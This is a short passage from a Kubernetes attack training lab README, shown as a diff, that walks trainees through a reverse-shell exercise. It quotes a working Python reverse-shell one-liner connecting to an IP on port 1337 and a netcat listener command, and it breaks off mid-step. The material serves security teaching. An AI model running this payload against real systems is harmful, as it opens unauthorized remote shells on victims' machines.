we45/container_training/K8s-Attacking-a-K8s-cluster/K8s-Cluster-Attack/README.md

 * you should be in the payloads directory.
 Open `reverse_shell.yml` with `atom reverse_shell.yml`
 * change the external IP address to your VM's IP address with ifconfig.
 Also make sure that port 1337 is available on your VM `["echo 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\"192.168.2.3\",1337));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call([\"/bin/sh\",\"-i\"]);' > shell.py && python shell.py &"]`
-* open a separate terminal and start your netcat listener.
+* open a separate terminal and start your netcat listener by running `nc -l 1337`
 * Now run:

 ```